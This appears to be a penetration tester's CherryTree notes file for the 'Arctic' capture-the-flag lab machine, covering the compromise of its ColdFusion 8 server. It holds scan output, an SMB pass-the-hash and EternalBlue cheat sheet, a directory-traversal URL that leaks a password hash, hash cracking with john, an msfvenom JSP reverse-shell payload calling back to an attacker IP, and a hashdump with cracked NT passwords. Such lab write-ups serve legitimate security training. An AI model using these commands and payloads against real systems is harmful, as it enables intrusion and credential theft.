<?xml version="1.0" ?>
<cherrytree>
	<node custom_icon_id="0" foreground="" is_bold="False" name="Arctic" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565077.42" ts_lastsave="1591816199.92" unique_id="38">
		<rich_text></rich_text>
		<node custom_icon_id="10" foreground="" is_bold="True" name="10.10.10.11" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1592420143.77" unique_id="39">
			<rich_text></rich_text>
			<node custom_icon_id="0" foreground="" is_bold="False" name="Setup" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587568434.39" ts_lastsave="1587568440.66" unique_id="83">
				<rich_text></rich_text>
				<node custom_icon_id="0" foreground="" is_bold="False" name="Alias" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587568479.92" ts_lastsave="1590145568.24" unique_id="84">
					<rich_text>export target=10.10.255.95
printenv
*
---
gedit /etc/hosts
add:
192.168.16.129 target</rich_text>
				</node>
			</node>
			<node custom_icon_id="21" foreground="" is_bold="False" name="Enumeration" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1492949452.72" unique_id="40">
				<rich_text></rich_text>
				<node custom_icon_id="18" foreground="" is_bold="False" name="TCP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1492949819.41" ts_lastsave="1587583334.51" unique_id="41">
					<rich_text></rich_text>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Ping Scan (Quick Sweep)" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587566370.19" ts_lastsave="1591375302.38" unique_id="80">
						<rich_text>ping 10.10.0.0/24
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Service &amp; OS Scan" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565364.18" ts_lastsave="1591212578.22" unique_id="76">
						<rich_text>sudo nmap -A target
(-O for just OS, -sV for just service)
---
Starting Nmap 7.80 ( </rich_text>
						<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
						<rich_text> ) at 2020-06-03 14:51 EDT
Nmap scan report for target (10.10.10.11)
Host is up (0.032s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at </rich_text>
						<rich_text link="webs https://nmap.org/submit/">https://nmap.org/submit/</rich_text>
						<rich_text> .
Nmap done: 1 IP address (1 host up) scanned in 62.55 seconds
---
</rich_text>
						<rich_text link="webs http://target:8500">http://target:8500</rich_text>
						<rich_text>/CFIDE/administrator
Adobe ColdFusion Server 8
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Full Scan" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565540.94" ts_lastsave="1591210596.76" unique_id="79">
						<rich_text>sudo nmap -p- -sV -sS -T4 target
---
Starting Nmap 7.80 ( </rich_text>
						<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
						<rich_text> ) at 2020-06-03 14:50 EDT
Nmap scan report for target (10.10.10.11)
Host is up (0.032s latency).
Not shown: 65532 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at </rich_text>
						<rich_text link="webs https://nmap.org/submit/">https://nmap.org/submit/</rich_text>
						<rich_text> .
Nmap done: 1 IP address (1 host up) scanned in 121.77 seconds
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Service Banners" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565457.83" ts_lastsave="1591210591.97" unique_id="78">
						<rich_text>sudo nmap -sV target
---
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Reconnoitre" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587583334.51" ts_lastsave="1587583348.93" unique_id="89">
						<rich_text link="webs https://github.com/codingo/Reconnoitre" scale="h3">Reconnoitre</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<codebox char_offset="12" frame_height="269" frame_width="475" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True"># Scan a single host, create file structure &amp; discover services
python reconnoitre.py -t 192.168.1.5 -o /root/Documents/labs/ --services

# Discover live hosts &amp; hostnames within a range
python reconnoitre.py -t 192.168.1.1-252 -o /root/Documents/testing/ --pingsweep --hostnames
    
# Discover live hosts within a range and then do a quick probe for services
python reconnoitre.py -t 192.168.1.1-252 -o /root/Documents/testing/ --pingsweep --services --quick    
    
# Discover live hosts w/in a range &amp; probe all ports (tcp &amp; udp) for services
python reconnoitre.py -t 192.168.1.1-252 -o /root/Documents/testing/ --pingsweep --services</codebox>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Vuln Scan" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587565374.96" ts_lastsave="1591210613.03" unique_id="77">
						<rich_text>sudo nmap -Pn --script vuln,nmap-vulners,vulscan target
---
Starting Nmap 7.80 ( </rich_text>
						<rich_text link="webs https://nmap.org">https://nmap.org</rich_text>
						<rich_text> ) at 2020-06-03 14:56 EDT
Nmap scan report for target (10.10.10.11)
Host is up.
All 1000 scanned ports on target (10.10.10.11) are filtered

Nmap done: 1 IP address (1 host up) scanned in 212.66 seconds
</rich_text>
					</node>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="UDP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1492949826.2" ts_lastsave="1587566901.16" unique_id="42">
					<rich_text></rich_text>
					<node custom_icon_id="0" foreground="" is_bold="False" name="UDP Scan" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587566901.16" ts_lastsave="1591210510.63" unique_id="81">
						<rich_text>nmap -sU -p- target
---
</rich_text>
					</node>
				</node>
				<node custom_icon_id="17" foreground="" is_bold="False" name="Web Services" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1592309157.89" unique_id="43">
					<rich_text link="webs https://github.com/InfosecMatter/default-http-login-hunter">https://github.com/InfosecMatter/default-http-login-hunter</rich_text>
					<rich_text>
---</rich_text>
					<node custom_icon_id="18" foreground="" is_bold="False" name="WhatWeb (profile)" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473692.93" ts_lastsave="1591211787.1" unique_id="46">
						<rich_text>whatweb target
---
</rich_text>
					</node>
					<node custom_icon_id="18" foreground="" is_bold="False" name="Nikto" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1492949545.74" ts_lastsave="1591211803.95" unique_id="44">
						<rich_text>nikto -h target -p 80,443
---
- Nikto v2.1.6
---------------------------------------------------------------------------
+ No web server found on target:8500
---------------------------------------------------------------------------
+ 0 host(s) tested
</rich_text>
					</node>
					<node custom_icon_id="18" foreground="" is_bold="False" name="Dirb\DirBuster" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1492949554.24" ts_lastsave="1591212169.14" unique_id="45">
						<rich_text>dirb -r </rich_text>
						<rich_text link="webs http://target">http://target</rich_text>
						<rich_text> /usr/share/dirb/wordlists/big.txt
---
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="gobuster" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590146587.26" ts_lastsave="1590778662.61" unique_id="91">
						<rich_text>gobuster dir -u </rich_text>
						<rich_text link="webs http://&lt;ip&gt;:3333">http://target:3333</rich_text>
						<rich_text> -w /usr/share/dirb/wordlists/big.txt
gobuster dir -u </rich_text>
						<rich_text link="webs http://10.10.255.95:3333">http://10.10.255.95:3333</rich_text>
						<rich_text> -w dirbuster/directory-list-2.3-medium.txt
/usr/share/wordlists has many lists
---
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="LFI" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587583115.16" ts_lastsave="1591212337.56" unique_id="88">
						<rich_text>10.10.10.11:8500/CFIDE/administrator/
---
/CFIDE/
Parent ..                                              dir   03/22/17 08:52 μμ
Application.cfm                                       1151   03/18/08 11:06 πμ
adminapi/                                              dir   03/22/17 08:53 μμ
administrator/                                         dir   03/22/17 08:55 μμ
classes/                                               dir   03/22/17 08:52 μμ
componentutils/                                        dir   03/22/17 08:52 μμ
debug/                                                 dir   03/22/17 08:52 μμ
images/                                                dir   03/22/17 08:52 μμ
install.cfm                                          12077   03/18/08 11:06 πμ
multiservermonitor-access-policy.xml                   278   03/18/08 11:07 πμ
probe.cfm                                            30778   03/18/08 11:06 πμ
scripts/                                               dir   03/22/17 08:52 μμ
wizards/        
---
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Aqutone (for reporting)" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587584029.69" ts_lastsave="1587584050.27" unique_id="90">
						<rich_text></rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="davtest" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590777870.15" ts_lastsave="1590781280.28" unique_id="96">
						<rich_text>davtest -url &lt;url&gt; [options]
davtest -url </rich_text>
						<rich_text link="webs http://granny.htb">http://granny.htb</rich_text>
						<rich_text> -cleanup
---
********************************************************
 Testing DAV connection
OPEN            FAIL:   </rich_text>
						<rich_text link="webs http://target">http://target</rich_text>
						<rich_text>   The URL &quot;</rich_text>
						<rich_text link="webs http://target/&quot;">http://target/&quot;</rich_text>
						<rich_text> is not DAV enabled or not accessible.
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="cadaver" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590777966.97" ts_lastsave="1590781313.02" unique_id="97">
						<rich_text>cadaver [OPTIONS] </rich_text>
						<rich_text link="webs http://hostname[:port]/path">http://target[:port]/path</rich_text>
						<rich_text>
---
</rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="default-http-login-hunter" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1592309150.72" ts_lastsave="1592309150.72" unique_id="99">
						<rich_text></rich_text>
					</node>
				</node>
				<node custom_icon_id="44" foreground="" is_bold="False" name="Other Services" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1587570784.47" unique_id="48">
					<rich_text></rich_text>
					<node custom_icon_id="0" foreground="" is_bold="False" name="SMB" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473455.56" ts_lastsave="1590579886.53" unique_id="49">
						<rich_text link="webs https://highon.coffee/blog/enum4linux-cheat-sheet/">https://highon.coffee/blog/enum4linux-cheat-sheet/</rich_text>
						<rich_text>

mount -t cifs &quot;//10.11.1.49/admin$&quot; /mnt/windows/ -o username=bethany\alice,domain=workgroup,password=loading1 --verbose

</rich_text>
						<rich_text scale="h2">SMB Enum</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Fingerprint SMB version</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Find open SMB Shares</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Enumerate SMB Users</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">SMB Server</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Pass the hash</rich_text>
						<rich_text>
</rich_text>
						<rich_text weight="heavy">SMB</rich_text>
						<rich_text>
In order to use pass the hash, we first need to put the hash in a env variable using the export command:
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

So we will atuhenticate against a smb-service.
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

I think you can run it like this too:
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text weight="heavy">Remote Desktop</rich_text>
						<rich_text>
</rich_text>
						<rich_text justification="left"></rich_text>
						<rich_text>

</rich_text>
						<rich_text scale="h2">Exploits</rich_text>
						<rich_text>
EternalBlue (MS17-010)
</rich_text>
						<codebox char_offset="183" frame_height="1034" frame_width="700" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">nmblookup -A 10.1.1.1

smbclient //MOUNT/share -I 10.1.1.1 -N
# connect to share, -N no password prompt

smbclient -L \\10.11.1.1 -U bob -S off
rpcclient -p 139 -U &quot;bob&quot; -S off 10.11.1.1
# disable message signing

rpcclient -U &quot;&quot; 10.1.1.1
# works on older windows versions

enum4linux 10.1.1.1
# discover Windows/Samba servers on subnet, finds Windows MAC addresses, netbios name &amp; discover client workgroup/domain

nbtscan 10.1.1.0/24
# do everything, runs all options apart from dictionary based share name guessing

enum4linux -a 10.1.1.1
# performs all basic enumeration using smb null session

enum4linux -U 192.168.1.2   
#-You will get userlist
# SMB null session is an unauthenticated netbios session between two computers.
# SMB null session is available for SMB1 systems only i.e 2000,xp,2003

#To use an smb null session :
rpcclient -U &quot;&quot; 192.168.1.2
#when asked enter empty password
rpcclient $&gt;srvinfo
rpcclient $&gt;enumdomusers
rpcclient $&gt;querydominfo
rpcclient $&gt;getdompwinfo
#password policy
rpcclient $&gt;netshareenum
nmblookup -A 192.168.1.1
rpcinfo -p &lt;target&gt;

#Enumerate using smbclinet:
smbclient -L //192.168.1.2
smbclient -L //192.168.1.2/myshare -U anonymous

smb&gt; get data.txt
smb&gt;put evil.txt

#Brute SMB password:
nmap -p445 --script=smb-brute.nse &lt;ip&gt;

# Brute force should always be your last option. 
# You can also use hydra to do it.

#Using nmap:
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.1.200-254

nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24

nmap -sSU -script smb-os-discovery.nse -p U:137,T:139,445 --script-args=smbsign=disable,smbuser=username,smbpass=password -oA 10.11.1.5_smbos -vv -n -Pn 10.11.1.5

nmap -sSU -script smb-vuln\* -p U:137,T:139,445 --script-args=smbsign=disable,smbuser=username,smbpass=password -oA 10.11.1.5_smbvuln -vv -n -Pn 10.11.1.5

nmap -sSU -script smb-enum\* -p U:137,T:139,445 --script-args=smbuser=username,smbpass=password -oA 10.11.1.5_smbenum -vv -n -Pn 10.11.1.5</codebox>
						<codebox char_offset="210" frame_height="44" frame_width="475" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True"></codebox>
						<codebox char_offset="234" frame_height="119" frame_width="475" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">nmap -oA 192.168.1.0_shares --script=smb-enum-shares --script-args=smbuser=username,smbpass=password -p445 192.168.1.0/24   
# possible techniques - specify no creds, empty creds, correct creds and incorrect creds

smbclient -L //192.168.1.100 -N
#list shares with no password prompt</codebox>
						<codebox char_offset="257" frame_height="44" frame_width="475" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">nmap --script=smb-enum-users -sSU -pU:137,T:139 -oA 192.168.1.200-254_smbusers 192.168.11.200-254 </codebox>
						<codebox char_offset="271" frame_height="125" frame_width="545" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">python /usr/share/doc/python-impacket/examples/smbserver.py probfine ./

#Get
copy \\10.1.1.1\probfine\payload .

#Put
copy C:\coolinfo \\10.1.1.1\probfine\</codebox>
						<codebox char_offset="397" frame_height="35" frame_width="590" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896</codebox>
						<codebox char_offset="447" frame_height="35" frame_width="365" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">pth-winexe -U administrator //192.168.1.101 cmd</codebox>
						<codebox char_offset="488" frame_height="35" frame_width="365" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">pth-winexe -U admin/hash:has //192.168.0.101 cmd</codebox>
						<codebox char_offset="506" frame_height="80" frame_width="455" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">apt-get update
apt-get install freerdp-x11

xfreerdp /u:admin /d:win7 /pth:hash:hash /v:192.168.1.101</codebox>
						<node custom_icon_id="0" foreground="" is_bold="False" name="enum4linux" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587571038.1" ts_lastsave="1590602741.72" unique_id="87">
							<rich_text>enum4linux -v target
---
</rich_text>
						</node>
						<node custom_icon_id="0" foreground="" is_bold="False" name="MetaSploit MS17-010" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590579886.53" ts_lastsave="1590603796.99" unique_id="92">
							<rich_text>msfconsole
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.223.62

</rich_text>
						</node>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="SNMP" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473619.73" ts_lastsave="1587570434.53" unique_id="50">
						<rich_text></rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="DB" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473622.74" ts_lastsave="1500473677.59" unique_id="51">
						<rich_text></rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="Other" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1500473623.25" ts_lastsave="1500473681.55" unique_id="52">
						<rich_text></rich_text>
					</node>
					<node custom_icon_id="0" foreground="" is_bold="False" name="RPC" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1587570784.47" ts_lastsave="1591211072.5" unique_id="85">
						<rich_text>enum4linux -v (or -a) target
nmblookup -A target
rpcclient -U “” target
---
user@kalisi:~$ enum4linux -v target
[V] Dependent program &quot;nmblookup&quot; found in /usr/bin/nmblookup
[V] Dependent program &quot;net&quot; found in /usr/bin/net
[V] Dependent program &quot;rpcclient&quot; found in /usr/bin/rpcclient
[V] Dependent program &quot;smbclient&quot; found in /usr/bin/smbclient
[V] Dependent program &quot;polenum&quot; found in /usr/bin/polenum
[V] Dependent program &quot;ldapsearch&quot; found in /usr/bin/ldapsearch
Starting enum4linux v0.8.9 ( </rich_text>
						<rich_text link="webs http://labs.portcullis.co.uk/application/enum4linux/">http://labs.portcullis.co.uk/application/enum4linux/</rich_text>
						<rich_text> ) on Wed Jun  3 15:04:51 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... target
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================================== 
|    Enumerating Workgroup/Domain on target    |
 ============================================== 
[V] Attempting to get domain name with command: nmblookup -A 'target'
[E] Can't find workgroup/domain


 ====================================== 
|    Nbtstat Information for target    |
 ====================================== 
Looking up status of 10.10.10.11
No reply from 10.10.10.11

 =============================== 
|    Session Check on target    |
 =============================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[V] Attempting to make null session using command: smbclient -W '' //'target'/ipc$ -U''%'' -c 'help' 2&gt;&amp;1
[E] Server doesn't allow session using username '', password ''.  Aborting remainder of tests.
---
user@kalisi:~$ nmblookup -A target
Looking up status of 10.10.10.11
No reply from 10.10.10.11
---
user@kalisi:~$ rpcclient -U &quot;&quot; target
Enter WORKGROUP\'s password: 
Cannot connect to server.  Error was NT_STATUS_IO_TIMEOUT
---
</rich_text>
					</node>
				</node>
			</node>
			<node custom_icon_id="22" foreground="" is_bold="False" name="Exploitation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1591966096.3" unique_id="53">
				<rich_text>searchsploit coldfusion

ColdFusion 8.0.1 - Arbitrary File Upload / Execution (Metasploit)    | exploits/cfm/webapps/16788.rb
Adobe ColdFusion Server 8.0.1 - '/administrator/enter.cfm' Query Str | exploits/cfm/webapps/33170.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_authenticatewizard | exploits/cfm/webapps/33167.txt
Adobe ColdFusion Server 8.0.1 - '/wizards/common/_logintowizard.cfm' | exploits/cfm/webapps/33169.txt
Adobe ColdFusion Server 8.0.1 - 'administrator/logviewer/searchlog.c | exploits/cfm/webapps/33168.txt
Adobe ColdFusion - 'probe.cfm' Cross-Site Scripting                  | exploits/cfm/webapps/36067.txt
Adobe ColdFusion - Directory Traversal                               | exploits/multiple/remote/14641.py
Adobe ColdFusion - Directory Traversal (Metasploit)                  | exploits/multiple/remote/16985.rb

CVE-2010-2861
</rich_text>
				<rich_text link="webs http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../../../../../../../../../../../../../Coldfusion8/lib/password.properties%00en">http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../../../../../../../../../../../../../Coldfusion8/lib/password.properties%00en</rich_text>
				<rich_text>

#Wed Mar 22 20:53:51 EET 2017 rdspassword=0IA/F[[E&gt;[$_6&amp; \\Q&gt;[K\=XP \n password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true 

hashid -m 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
Analyzing '2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03'
[+] SHA-1 [Hashcat Mode: 100]
[+] Double SHA-1 [Hashcat Mode: 4500]
[+] RIPEMD-160 [Hashcat Mode: 6000]
[+] Haval-160 
[+] Tiger-160 
[+] HAS-160 
[+] LinkedIn [Hashcat Mode: 190]
[+] Skein-256(160) 
[+] Skein-512(160) 


user@kalisi:~/Downloads$ hashcat -m 100 sha1hash --show
user@kalisi:~/Downloads$ 


sudo john --format=raw-sha1 sha1hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
happyday         (?)
1g 0:00:00:00 DONE 2/3 (2020-06-12 07:39) 100.0g/s 145600p/s 145600c/s 145600C/s hamilton..harley1
Use the &quot;--show --format=Raw-SHA1&quot; options to display all of the cracked passwords reliably
Session completed

user@kalisi:~/Downloads$ sudo john --format=raw-sha1 sha1hash --show
?:happyday

1 password hash cracked, 0 left

---
#create payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=41854 -f raw &gt; arcticreverseshell.jsp

#serve up payload
sudo python -m SimpleHTTPServer 80

#listener
nc -nlvp 41854

#ColdFusion Scheduled Tasks
URL:</rich_text>
				<rich_text link="webs http://10.10.14.5/arcticreverseshell.jsp">http://10.10.14.5/arcticreverseshell.jsp</rich_text>
				<rich_text>
File: C:\ColdFustion8\wwwroot\CFIDE\arctic.jsp


</rich_text>
			</node>
			<node custom_icon_id="21" foreground="" is_bold="False" name="Post Exploitation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1590606029.51" unique_id="54">
				<rich_text></rich_text>
				<node custom_icon_id="44" foreground="" is_bold="False" name="Script Results" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1495714301.41" ts_lastsave="1495714310.34" unique_id="55">
					<rich_text></rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Host Information" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1500474204.83" unique_id="56">
					<rich_text underline="single" weight="heavy">Operating System</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Architecture</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Domain</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Installed Updates</rich_text>
					<rich_text>

</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="File System" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1500474208.8" unique_id="57">
					<rich_text underline="single" weight="heavy">Writeable Files\Directories</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Directory List</rich_text>
					<rich_text>




</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Running Processes" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1495714268.27" unique_id="58">
					<rich_text underline="single" weight="heavy">Process List</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Installed Applications" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1495714509.19" unique_id="59">
					<rich_text underline="single" weight="heavy">Installed Applications</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Users &amp; Groups" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1500474213.69" unique_id="60">
					<rich_text underline="single" weight="heavy">Users</rich_text>
					<rich_text>




</rich_text>
					<rich_text underline="single" weight="heavy">Groups</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Network" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1500474223.91" unique_id="61">
					<rich_text underline="single" weight="heavy">IPConfig\IFConfig
</rich_text>
					<rich_text>



</rich_text>
					<rich_text underline="single" weight="heavy">Network Processes</rich_text>
					<rich_text>




</rich_text>
					<rich_text underline="single" weight="heavy">ARP</rich_text>
					<rich_text>




</rich_text>
					<rich_text underline="single" weight="heavy">DNS</rich_text>
					<rich_text>




</rich_text>
					<rich_text underline="single" weight="heavy">Route</rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Scheduled Jobs" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1496953428.46" unique_id="62">
					<rich_text underline="single" weight="heavy">Scheduled Tasks</rich_text>
				</node>
				<node custom_icon_id="0" foreground="" is_bold="False" name="Hashes" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590606014.85" ts_lastsave="1591962106.82" unique_id="94">
					<rich_text>Adobe ColdFusion Hash:


#Wed Mar 22 20:53:51 EET 2017 rdspassword=0IA/F[[E&gt;[$_6&amp; \\Q&gt;[K\=XP \n password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03 encrypted=true 

hashid -m 2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
Analyzing '2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03'
[+] SHA-1 [Hashcat Mode: 100]
[+] Double SHA-1 [Hashcat Mode: 4500]
[+] RIPEMD-160 [Hashcat Mode: 6000]
[+] Haval-160 
[+] Tiger-160 
[+] HAS-160 
[+] LinkedIn [Hashcat Mode: 190]
[+] Skein-256(160) 
[+] Skein-512(160) 


user@kalisi:~/Downloads$ hashcat -m 100 sha1hash --show
user@kalisi:~/Downloads$ 


sudo john --format=raw-sha1 sha1hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
happyday         (?)
1g 0:00:00:00 DONE 2/3 (2020-06-12 07:39) 100.0g/s 145600p/s 145600c/s 145600C/s hamilton..harley1
Use the &quot;--show --format=Raw-SHA1&quot; options to display all of the cracked passwords reliably
Session completed

user@kalisi:~/Downloads$ sudo john --format=raw-sha1 sha1hash --show
?:happyday

1 password hash cracked, 0 left

</rich_text>
				</node>
			</node>
			<node custom_icon_id="0" foreground="" is_bold="False" name="Hashes: John" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1590603834.28" ts_lastsave="1590603848.08" unique_id="93">
				<rich_text>meterpreter &gt; hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::


sudo john --format=NT --rules --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)
alqfna22         (Jon)
2g 0:00:00:04 DONE (2020-05-27 14:54) 0.4889g/s 2493Kp/s 2493Kc/s 2495KC/s alr19882006..alpusidi
Warning: passwords printed above might not be all those cracked
Use the &quot;--show --format=NT&quot; options to display all of the cracked passwords reliably
Session completed

</rich_text>
			</node>
			<node custom_icon_id="10" foreground="" is_bold="False" name="Priv Escalation" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1592422430.27" unique_id="63">
				<rich_text>Windows:
whoami
systeminfo
</rich_text>
				<rich_text link="webs https://github.com/bitsadmin/wesng">https://github.com/bitsadmin/wesng</rich_text>
				<rich_text>

</rich_text>
				<rich_text underline="single" weight="heavy">Discovery of Vulnerability</rich_text>
				<rich_text>
search for all SUID bits set:
SUID gives temporary permissions to a user to run the program/file with the permission of the file owner (rather than the user who runs it).
For example, the binary file to change your password has the SUID bit set on it (/usr/bin/passwd). This is because to change your password, it will need to write to the shadowers file that you do not have access to, root does, so it has root privileges to make the right changes.

find . -perm /4000 2&gt;/dev/null
/bin/systemctl stood out

</rich_text>
